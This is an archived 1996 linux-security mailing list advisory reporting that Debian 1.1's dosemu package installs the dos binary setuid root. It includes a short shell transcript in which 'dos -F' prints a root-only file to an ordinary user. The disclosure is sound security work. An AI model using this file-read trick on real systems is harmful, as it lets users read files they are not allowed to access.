[1293] in linux-security and linux-alert archive

[linux-security] Security hole in Debian 1.1 dosemu package

daemon@ATHENA.MIT.EDU (Daniel Quinlan)
Thu Nov 14 17:32:33 1996

Old-X-Envelope-From: quinlan@pathname.com  Thu Nov 14 03:15:23 1996
Date: Thu, 14 Nov 96 00:14 PST
From: Daniel Quinlan <quinlan@proton.pathname.com>
To: linux-security@tarsier.cv.nrao.edu
Reply-To: quinlan@pathname.com
Resent-From: linux-security@redhat.com

In Debian 1.1, the optional DOSEMU package installs /usr/sbin/dos
setuid root.  This is a serious security hole which can be exploited
to gain access to any file on the system.

Package: dosemu
Version: 0.64.0.2-9

------- start of cut text --------------
$ cat /etc/debian_version 
1.1
$ id
uid=xxxx(quinlan) gid=xxxx(quinlan) groups=xxxx(quinlan),20(dialout),24(cdrom)
[quinlan:~]$ ls -al /usr/bin/dos
-rwsr-xr-x   1 root     root       569576 Oct 24 00:05 /usr/bin/dos
$ ls -al /root/foo
-rw-------   1 root     root         1117 Nov 13 23:10 /root/foo
$ dos -F /root/foo
[ Prints /root/foo, which is not readable by user `quinlan'. ]
------- end ----------------------------

I expect there may be other holes in dosemu other than this one that
can be exploited if it is installed setuid root.  It took about 60
seconds to find this hole once I realized /usr/bin/dos was setuid
root.

Dan
